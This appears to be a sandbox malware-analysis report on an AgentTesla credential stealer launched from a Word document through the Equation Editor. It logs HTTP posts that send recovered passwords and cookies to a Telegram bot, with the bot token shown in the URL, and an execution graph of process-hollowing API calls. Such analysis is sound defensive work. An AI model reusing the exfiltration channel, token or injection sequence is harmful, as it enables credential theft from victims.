42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff
                                                                                        Data Ascii: ( @BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
                                                                                        2022-08-08 15:18:44 UTC181INData Raw: 77 77 77 77 77 77 77 77 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 77 77 77
                                                                                        Data Ascii: wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
                                                                                        2022-08-08 15:18:44 UTC182INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii:
                                                                                        2022-08-08 15:18:44 UTC186INData Raw: 42 42 42 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42
                                                                                        Data Ascii: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        5192.168.2.2249181149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        2022-08-08 15:18:49 UTC188OUTPOST /bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=---------------------------8da7965034df172
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 1028
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        2022-08-08 15:18:49 UTC189INHTTP/1.1 100 Continue


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        6192.168.2.2249182149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        2022-08-08 15:18:57 UTC189OUTPOST /bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=---------------------------8da79653dcfca72
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 1028
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        2022-08-08 15:18:57 UTC189INHTTP/1.1 100 Continue
                                                                                        2022-08-08 15:18:57 UTC189OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 36 35 33 64 63 66 63 61 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 2d 36 32 34 38 33 34 36 34 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 36 35 33 64 63 66 63 61 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 34 37 32 38 34 37 0a 4f 53 46 75 6c 6c
                                                                                        Data Ascii: -----------------------------8da79653dcfca72Content-Disposition: form-data; name="chat_id"-624834641-----------------------------8da79653dcfca72Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/472847OSFull
                                                                                        2022-08-08 15:18:57 UTC190OUTData Raw: 2d 2d 0d 0a
                                                                                        Data Ascii: --
                                                                                        2022-08-08 15:18:57 UTC190INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Mon, 08 Aug 2022 15:18:57 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 646
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        {"ok":true,"result":{"message_id":1840,"from":{"id":5520247480,"is_bot":true,"first_name":"Gentlelogger","username":"gentlelogger_bot"},"chat":{"id":-624834641,"title":"Result Panel","type":"group","all_members_are_administrators":true},"date":1659971937,"document":{"file_name":"user-472847 2022-08-08 05-41-36.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAIHMGLxKWH2-C_4PodVD9rVgG-ABPMsAAI9AwACOBiIR9Hes7KKS-gIKQQ","file_unique_id":"AgADPQMAAjgYiEc","file_size":449},"caption":"New PW Recovered!\n\nUser Name: user/472847\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        7192.168.2.2249183149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        2022-08-08 15:18:59 UTC191OUTPOST /bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=---------------------------8da796756c9caf4
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 5245
                                                                                        Expect: 100-continue
                                                                                        2022-08-08 15:18:59 UTC191INHTTP/1.1 100 Continue
                                                                                        2022-08-08 15:18:59 UTC191OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 36 37 35 36 63 39 63 61 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 2d 36 32 34 38 33 34 36 34 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 36 37 35 36 63 39 63 61 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 34 37 32 38 34 37 0a 4f 53
                                                                                        Data Ascii: -----------------------------8da796756c9caf4Content-Disposition: form-data; name="chat_id"-624834641-----------------------------8da796756c9caf4Content-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/472847OS
                                                                                        2022-08-08 15:18:59 UTC192OUTData Raw: 4e 3c b6 2a 97 a2 6c 56 8b 79 d9 f8 4a 33 4e 8f 12 37 1a 09 f2 09 17 ce c5 49 83 b3 e7 71 95 58 8c 6a be 32 25 5e 8f 29 98 4e 6c 84 9d 34 91 14 61 a1 9e d6 d0 66 37 59 ed 26 6a fc 50 46 b5 21 2c 46 fb 32 1b 45 64 19 1e 84 26 2a 3e 21 ea 61 75 40 80 9c a4 63 48 32 6b df 27 5e 23 48 21 c7 48 ab c3 6e 24 0c a4 31 97 28 78 4a d3 50 79 8a 56 93 94 a2 c2 64 23 77 4c 8e 31 37 49 8e 31 f7 20 30 30 9b e5 e2 eb ed cd 5a 1d 32 9c 17 05 04 85 33 07 fb 91 8c 60 4a 64 cc bd 8e 4f d0 c6 a6 2a 75 d1 6a e5 a8 9e 9c d7 4f d4 69 16 28 75 69 d8 2b aa 34 39 f6 60 62 a3 9a 07 06 b0 f9 be 91 de 4f ca 67 a6 07 83 82 79 e5 d0 c9 2a 60 32 96 59 d4 73 d0 63 08 fa 1d 7a 0c 3d f3 0b 3c 71 00 00 00 00 00 00 00 00 00 78 76 93 47 4e dc 05 1c 89 78 29 b3 6d 62 b5 28 66 f8 0b 39 91 e2 e1
                                                                                        Data Ascii: N<*lVyJ3N7IqXj2%^)Nl4af7Y&jPF!,F2Ed&*>!au@cH2k'^#H!Hn$1(xJPyVd#wL17I1 00Z23`JdO*ujOi(ui+49`bOgy*`2Yscz=<qxvGNx)mb(f9
                                                                                        2022-08-08 15:18:59 UTC196OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 36 37 35 36 63 39 63 61 66 34 2d 2d 0d 0a
                                                                                        Data Ascii: -----------------------------8da796756c9caf4--
                                                                                        2022-08-08 15:19:00 UTC196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Mon, 08 Aug 2022 15:19:00 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 656
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        {"ok":true,"result":{"message_id":1841,"from":{"id":5520247480,"is_bot":true,"first_name":"Gentlelogger","username":"gentlelogger_bot"},"chat":{"id":-624834641,"title":"Result Panel","type":"group","all_members_are_administrators":true},"date":1659971940,"document":{"file_name":"user-472847 2022-08-08 05-56-07.zip","mime_type":"application/zip","file_id":"BQACAgEAAxkDAAIHMWLxKWQr-_uXqudNDJEEacn7GJxtAAI-AwACOBiIR-UpSrV_q0l-KQQ","file_unique_id":"AgADPgMAAjgYiEc","file_size":4657},"caption":"New Cookie Recovered!\n\nUser Name: user/472847\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:17:18:11
                                                                                        Start date:08/08/2022
                                                                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                        Imagebase:0x13fda0000
                                                                                        File size:1423704 bytes
                                                                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Target ID:2
                                                                                        Start time:17:18:13
                                                                                        Start date:08/08/2022
                                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                        Imagebase:0x400000
                                                                                        File size:543304 bytes
                                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Target ID:5
                                                                                        Start time:17:18:20
                                                                                        Start date:08/08/2022
                                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                        Imagebase:0x400000
                                                                                        File size:543304 bytes
                                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Target ID:6
                                                                                        Start time:17:18:21
                                                                                        Start date:08/08/2022
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:cmd.exe /c%tmp%\Client.exe A C
                                                                                        Imagebase:0x4a6d0000
                                                                                        File size:302592 bytes
                                                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Target ID:9
                                                                                        Start time:17:18:22
                                                                                        Start date:08/08/2022
                                                                                        Path:C:\Users\user\AppData\Local\Temp\Client.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\Client.exe A C
                                                                                        Imagebase:0xac0000
                                                                                        File size:8192 bytes
                                                                                        MD5 hash:7E2FF60FD955B39768565DFE645E49C0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.932287438.0000000003109000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.932287438.0000000003109000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000009.00000002.932287438.0000000003109000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.932391087.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.932391087.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000009.00000002.932391087.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 20%, ReversingLabs
                                                                                        Reputation:low

                                                                                        Target ID:10
                                                                                        Start time:17:18:25
                                                                                        Start date:08/08/2022
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        Imagebase:0xc30000
                                                                                        File size:45216 bytes
                                                                                        MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.986609163.0000000002390000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.986080759.0000000002309000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.986080759.0000000002309000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.986080759.0000000002309000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.926194509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.926194509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000A.00000000.926194509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        Reputation:moderate

                                                                                        Target ID:12
                                                                                        Start time:17:18:51
                                                                                        Start date:08/08/2022
                                                                                        Path:C:\Users\user\AppData\Local\Temp\Client.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Client.exe"
                                                                                        Imagebase:0x1230000
                                                                                        File size:8192 bytes
                                                                                        MD5 hash:7E2FF60FD955B39768565DFE645E49C0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:low

                                                                                        Target ID:13
                                                                                        Start time:17:18:51
                                                                                        Start date:08/08/2022
                                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                        Imagebase:0x400000
                                                                                        File size:543304 bytes
                                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Target ID:15
                                                                                        Start time:17:18:53
                                                                                        Start date:08/08/2022
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        Imagebase:0xc30000
                                                                                        File size:45216 bytes
                                                                                        MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.1003248820.00000000020EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate

                                                                                        Target ID:16
                                                                                        Start time:17:18:54
                                                                                        Start date:08/08/2022
                                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                        Imagebase:0x400000
                                                                                        File size:543304 bytes
                                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language

                                                                                        Target ID:17
                                                                                        Start time:17:18:54
                                                                                        Start date:08/08/2022
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:cmd.exe /c%tmp%\Client.exe A C
                                                                                        Imagebase:0x49e80000
                                                                                        File size:302592 bytes
                                                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language

                                                                                        Target ID:20
                                                                                        Start time:17:18:56
                                                                                        Start date:08/08/2022
                                                                                        Path:C:\Users\user\AppData\Local\Temp\Client.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\Client.exe A C
                                                                                        Imagebase:0x1230000
                                                                                        File size:8192 bytes
                                                                                        MD5 hash:7E2FF60FD955B39768565DFE645E49C0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET

                                                                                        Target ID:21
                                                                                        Start time:17:19:00
                                                                                        Start date:08/08/2022
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        Imagebase:0xc30000
                                                                                        File size:45216 bytes
                                                                                        MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.1193449278.00000000022DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:27.2%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:61.3%
                                                                                          Total number of Nodes:31
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 2163 2f2868 2164 2f2882 2163->2164 2167 2f28c9 2164->2167 2168 2f2903 2167->2168 2188 2f3b1d 2168->2188 2192 2f3b28 2168->2192 2169 2f30ea 2184 2f48b8 VirtualAllocEx 2169->2184 2185 2f48b1 VirtualAllocEx 2169->2185 2170 2f3443 2176 2f4658 WriteProcessMemory 2170->2176 2177 2f4660 WriteProcessMemory 2170->2177 2171 2f37ff 2181 2f4658 WriteProcessMemory 2171->2181 2182 2f4660 WriteProcessMemory 2171->2182 2172 2f3851 2174 2f3961 2172->2174 2180 2f4000 Wow64SetThreadContext 2172->2180 2173 2f353f 2173->2171 2186 2f4658 WriteProcessMemory 2173->2186 2187 2f4660 WriteProcessMemory 2173->2187 2183 2f49d8 ResumeThread 2174->2183 2175 2f28a0 2176->2173 2177->2173 2180->2174 2181->2172 2182->2172 2183->2175 2184->2170 2185->2170 2186->2173 2187->2173 2189 2f3b28 CreateProcessA 2188->2189 2191 2f3e4f 2189->2191 2191->2191 2193 2f3baf CreateProcessA 2192->2193 2195 2f3e4f 2193->2195 2195->2195 2196 2f2857 2197 2f2867 2196->2197 2199 2f28c9 8 API calls 2197->2199 2198 2f28a0 2199->2198

                                                                                          Callgraph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          • Opacity -> Relevance
                                                                                          • Disassembly available
                                                                                          callgraph 0 Function_002F3F2F 1 Function_002F032D 2 Function_002F1FAA 3 Function_002F1AA8 4 Function_002F3B28 5 Function_002F1A28 6 Function_002F1CA8 37 Function_002F2068 6->37 48 Function_002F2061 6->48 67 Function_002F1DC0 6->67 7 Function_002F19A0 8 Function_002F203A 9 Function_002F0238 10 Function_002F1A38 11 Function_002F48B8 12 Function_002F47B8 13 Function_002F0335 14 Function_002F0331 15 Function_002F48B1 16 Function_002F4530 17 Function_002F19B0 18 Function_002F47B0 19 Function_002F2009 20 Function_002F0108 21 Function_002F2805 22 Function_002F4000 23 Function_002F1C00 24 Function_002F3F1D 25 Function_002F3B1D 26 Function_002F021D 27 Function_002F411C 28 Function_002F0219 29 Function_002F1C98 29->37 29->48 29->67 30 Function_002F2698 31 Function_002F0698 32 Function_002F1F95 33 Function_002F0215 34 Function_002F0694 35 Function_002F006D 36 Function_002F0069 75 Function_002F25D8 37->75 38 Function_002F2868 63 Function_002F28C9 38->63 39 Function_002F1AE8 39->6 39->29 40 Function_002F1268 41 Function_002F00E8 41->40 42 Function_002F0167 43 Function_002F0065 44 Function_002F01E5 45 Function_002F05E5 46 Function_002F19E2 47 Function_002F0061 48->75 49 Function_002F01E1 50 Function_002F4660 51 Function_002F02FD 52 Function_002F27FC 53 Function_002F02F9 54 Function_002F1978 55 Function_002F03F8 56 Function_002F0075 57 Function_002F02F5 58 Function_002F0071 59 Function_002F0270 60 Function_002F3A70 61 Function_002F19F0 62 Function_002F024D 63->4 63->6 63->11 63->15 63->22 63->23 63->25 63->50 74 Function_002F49D8 63->74 76 Function_002F4658 63->76 64 Function_002F0448 65 Function_002F00C7 66 Function_002F2043 68 Function_002F03C0 69 Function_002F05DE 70 Function_002F005D 71 Function_002F01DD 72 Function_002F185A 73 Function_002F0059 77 Function_002F2857 77->63 78 Function_002F0255 79 Function_002F0055 80 Function_002F05D5 81 Function_002F0251 82 Function_002F0350

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
